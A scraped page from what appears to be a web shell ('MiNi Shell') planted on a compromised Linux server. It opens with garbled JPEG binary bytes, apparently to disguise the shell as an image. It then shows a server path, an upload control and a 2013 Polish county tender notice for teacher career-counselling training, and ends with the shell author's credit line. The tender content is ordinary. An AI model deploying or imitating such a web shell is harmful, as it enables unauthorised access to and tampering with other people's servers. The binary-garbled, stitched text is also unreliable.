JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/456980-N-2013.html

<p class="kh_header"><b>Nisko: Przeprowadzenie szkolenia dla	Rady Pedagogicznej: Zespołu Szkół im. gen. Władysława Sikorskiego w Rudniku	nad Sanem, Zespołu Szkół im. ks. Stanisława Staszica w Jeżowem oraz Regionalnego Centrum Edukacji Zawodowej w Nisku w ramach projektu pn.: Podkarpacie stawia 	na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach	Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 456980 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl, poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia dla	Rady Pedagogicznej: Zespołu Szkół im. gen. Władysława Sikorskiego w Rudniku	nad Sanem, Zespołu Szkół im. ks. Stanisława Staszica w Jeżowem oraz Regionalnego Centrum Edukacji Zawodowej w Nisku w ramach projektu pn.: Podkarpacie stawia 	na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach	Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. SZKOLENIA RADY PEDAGOGICZNEJ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW W ZESPOLE SZKÓŁ IM. GEN. WŁADYSŁAWA SIKORSKIEGO W RUDNIKU NAD SANEM
Szkolenie I
Temat: Wprowadzenie do problematyki doradztwa edukacyjno-zawodowego w szkole
Termin: od dnia podpisania umowy do 13 grudnia 2013 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 1 grupa do 27 osób
Cel szkolenia: zapoznanie nauczycieli z podstawami doradztwa zawodowego, 
uwrażliwienie na konieczność zachowania ciągłości procesu doradczego na		różnych etapach edukacji
Metody zajęć - wykład aktywizujący 
Prowadzący - doradca zawodowy, psycholog, pedagog, socjolog
Zagadnienia:
1. Wyjaśnienie podstawowych pojęć dotyczących zawodoznawstwa 
1) orientacja zawodowa
2) doradztwo zawodowe
3) poradnictwo zawodowe
4) informacja zawodowa
2.	Funkcjonowanie systemu doradztwa i poradnictwa zawodowego w Polsce
1) poradnictwo zawodowe w resorcie edukacji
2) poradnictwo zawodowe w resorcie pracy
3.	Istota poradnictwa edukacyjno-zawodowego w aspekcie faz rozwoju zawodowego człowieka
4. 	Podstawy organizacji wewnątrzszkolnego systemu działań edukacyjno-doradczych na terenie 	szkoły
1) uregulowania prawne
2) diagnoza potrzeb w zakresie doradztwa
3) współpraca członków rady pedagogicznej
4) planowanie i koordynowanie działań doradczych

Szkolenie II 
Temat: Wewnątrzszkolny system doradztwa zawodowego - formy działań doradczych
Termin - od dnia podpisania umowy do 31 marca 2014 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 1 grupa do 27 osób
Cel szkolenia poznanie wybranych narzędzi pomiaru zawodowego, 
poznanie technik pracy doradcy zawodowego, 
ćwiczenie umiejętności wykorzystywania informacji zawodowej
Metody zajęć - wykład aktywizujący, ćwiczenia
Prowadzący - doradca zawodowy, psycholog, pedagog
Zagadnienia:
1. Założenia wewnątrzszkolnego systemu doradztwa zawodowego - cele, zadania i organizacja
2. Tworzenie i wykorzystywanie informacji zawodowej w szkole przez uczniów i nauczycieli, zakres zasobów informacyjnych zalecanych w obrębie:
1) literatury przedmiotowo-metodycznej
2) filmów szkoleniowo-dydaktycznych
3) scenariuszy gotowych zajęć z doradztwa zawodowego
4) bazy adresowej stron internetowych poświęconych doradztwu zawodowemu
3. Przegląd wybranych narzędzi pracy doradcy zawodowego w zakresie pomiaru pedagogicznego
4. Współpraca z rodzicami uczniów w procesie doradztwa zawodowego na terenie szkoły
5. Wykorzystywanie przez nauczycieli kształcenia przedmiotowego do wskazywania związków wybranych treści nauczania z realnymi sytuacjami praktycznymi i życiowymi - przykłady
2. SZKOLENIE RADY PEDAGOGICZNEJ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW W ZESPOLE SZKÓŁ IM. KS. STANISŁAWA STASZICA W JEŻOWEM
Szkolenie I
Temat: Wprowadzenie do problematyki doradztwa edukacyjno-zawodowego w szkole
Termin: od dnia podpisania umowy do 13 grudnia 2013 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 1 grupa do 19 osób
Cel szkolenia: zapoznanie nauczycieli z podstawami doradztwa zawodowego,
uwrażliwienie na konieczność zachowania ciągłości procesu doradczego na różnych etapach edukacji
Metody zajęć - wykład aktywizujący 
Prowadzący - doradca zawodowy, psycholog, pedagog, socjolog
Zagadnienia:
1. Wyjaśnienie podstawowych pojęć dotyczących zawodoznawstwa 
1) orientacja zawodowa
2) doradztwo zawodowe
3) poradnictwo zawodowe
4) informacja zawodowa
2.	Funkcjonowanie systemu doradztwa i poradnictwa zawodowego w Polsce
1) poradnictwo zawodowe w resorcie edukacji
2) poradnictwo zawodowe w resorcie pracy
1. Istota poradnictwa edukacyjno-zawodowego w aspekcie faz rozwoju zawodowego człowieka
2. Podstawy organizacji wewnątrzszkolnego systemu działań edukacyjno-doradczych na terenie szkoły
1) uregulowania prawne
2) diagnoza potrzeb w zakresie doradztwa
3) współpraca członków rady pedagogicznej
4) planowanie i koordynowanie działań doradczych

Szkolenie II 
Temat: Wewnątrzszkolny system doradztwa zawodowego - formy działań doradczych
Termin -  od  dnia podpisania umowy do 31 marca 2014 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 1 grupa do 19 osób
Cel szkolenia poznanie wybranych narzędzi pomiaru zawodowego, 
poznanie technik pracy doradcy zawodowego, 
ćwiczenie umiejętności wykorzystywania informacji zawodowej
Metody zajęć - wykład aktywizujący, ćwiczenia
Prowadzący - doradca zawodowy, psycholog, pedagog
Zagadnienia:
1. Założenia wewnątrzszkolnego systemu doradztwa zawodowego - cele, zadania i organizacja
2. Tworzenie i wykorzystywanie informacji zawodowej w szkole przez uczniów i nauczycieli, zakres zasobów informacyjnych zalecanych w obrębie:
1) literatury przedmiotowo-metodycznej
2) filmów szkoleniowo-dydaktycznych
3) scenariuszy gotowych zajęć z doradztwa zawodowego
4) bazy adresowej stron internetowych poświęconych doradztwu zawodowemu
3. Przegląd wybranych narzędzi pracy doradcy zawodowego w zakresie pomiaru pedagogicznego
4. Współpraca z rodzicami uczniów w procesie doradztwa zawodowego na terenie szkoły
5. Wykorzystywanie przez nauczycieli kształcenia przedmiotowego do wskazywania związków wybranych treści nauczania z realnymi sytuacjami praktycznymi i życiowymi - przykłady

3. SZKOLENIE RADY PEDAGOGICZNEJ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW W REGIONALNYM CENTRUM EDUKACJI ZAWODOWEJ W NISKU
Szkolenie I
Temat: Wprowadzenie do problematyki doradztwa edukacyjno-zawodowego w szkole
Termin: od dnia podpisania umowy do 13 grudnia 2013 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 2 grupy po 30 osób
Cel szkolenia: zapoznanie nauczycieli z podstawami doradztwa zawodowego,
uwrażliwienie na konieczność zachowania ciągłości procesu doradczego na różnych etapach edukacji
Metody zajęć - wykład aktywizujący 
Prowadzący - doradca zawodowy, psycholog, pedagog, socjolog
Zagadnienia:
1. Wyjaśnienie podstawowych pojęć dotyczących zawodoznawstwa 
1) orientacja zawodowa
2) doradztwo zawodowe
3) poradnictwo zawodowe
4) informacja zawodowa
2. Funkcjonowanie systemu doradztwa i poradnictwa zawodowego w Polsce
1) poradnictwo zawodowe w resorcie edukacji
2) poradnictwo zawodowe w resorcie pracy
3. Istota poradnictwa edukacyjno-zawodowego w aspekcie faz rozwoju zawodowego człowieka
4. Podstawy organizacji wewnątrzszkolnego systemu działań edukacyjno-doradczych na terenie szkoły
1) uregulowania prawne
2) diagnoza potrzeb w zakresie doradztwa
3) współpraca członków rady pedagogicznej
4) planowanie i koordynowanie działań doradczych

Szkolenie II 
Temat: Wewnątrzszkolny system doradztwa zawodowego - formy działań doradczych
Termin -  od dnia podpisania umowy do 31 marca 2014 r. 
Czas trwania - 4 godziny zegarowe 60 minut
Uczestniczy - wszyscy członkowie Rady Pedagogicznej - 2 grupy po 30 osób
Cel szkolenia poznanie wybranych narzędzi pomiaru zawodowego, 
poznanie technik pracy doradcy zawodowego, 
ćwiczenie umiejętności wykorzystywania informacji zawodowej
Metody zajęć - wykład aktywizujący, ćwiczenia
Prowadzący - doradca zawodowy, psycholog, pedagog
Zagadnienia:
1. Założenia wewnątrzszkolnego systemu doradztwa zawodowego - cele, zadania i organizacja
2. Tworzenie i wykorzystywanie informacji zawodowej w szkole przez uczniów i nauczycieli, zakres zasobów informacyjnych zalecanych w obrębie:
1. literatury przedmiotowo-metodycznej
2. filmów szkoleniowo-dydaktycznych
3. scenariuszy gotowych zajęć z doradztwa zawodowego
4. bazy adresowej stron internetowych poświęconych doradztwu zawodowemu
3. Przegląd wybranych narzędzi pracy doradcy zawodowego w zakresie pomiaru pedagogicznego
4. Współpraca z rodzicami uczniów w procesie doradztwa zawodowego na terenie szkoły
5. Wykorzystywanie przez nauczycieli kształcenia przedmiotowego do wskazywania związków wybranych treści nauczania z realnymi sytuacjami praktycznymi i życiowymi - przykłady

Do obowiązków wykonawcy należy:
1) Przeprowadzenie szkolenia z należytą starannością,
2) terminowe wypełnienie dokumentów związanych z realizacją szkolenia przez	Zamawiającego, w tym zapewnienie podpisywania list obecności przez osoby biorące udział	w szkoleniu, gromadzenie list obecności,
3) niezwłoczne informowanie Zamawiającego o problemach związanych z realizacją szkolenia,
4) opracowanie i przekazanie Zamawiającemu raportu końcowego z przeprowadzonego szkolenia,
5) informowanie osób biorących udział w szkoleniu o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
6) przekazanie Zamawiającemu w terminie 5 dni od daty podpisania umowy CV osób	odpowiedzialnych za prowadzenie szkolenia,
7) zapewnienie materiałów szkoleniowych niezbędnych do efektywnego przeprowadzenia 	szkolenia,
8) przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 29 sierpnia 	1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.) podczas wykonywania przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza	spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza	spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza	spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza	spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza	spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 1 do SIWZ)  2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmniejszenie zakresu przedmiotu zamówienia gdy jego wykonanie w pierwotnym	zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu	Zamawiającego,
zmiany terminu realizacji przedmiotu zamówienia, w przypadku:
gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego w zakresie uzasadnionego interesu Zamawiającego,
wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do	przewidzenia i niemożliwego do zapobieżenia,
zaistnienia okoliczności (technicznych, gospodarczych itp.) których nie można było	przewidzieć chwili zawarcia umowy,
konieczności zmiany osób przewidzianych  do wykonania przedmiotu umowy,
wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie	ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2,  37 - 400 Nisko - Wydział Gospodarki Mieniem Powiatu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku. Pl. Wolności 2, 37 - 400 Nisko w Biurze Obsługi Interesanta (pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przeprowadzenie szkolenia dla	Rady Pedagogicznej: Zespołu Szkół im. gen. Władysława Sikorskiego w Rudniku nad Sanem, Zespołu Szkół im. ks. Stanisława Staszica w Jeżowem oraz Regionalnego Centrum Edukacji Zawodowej w Nisku w ramach projektu pn.: Podkarpacie stawia 	na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach	Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com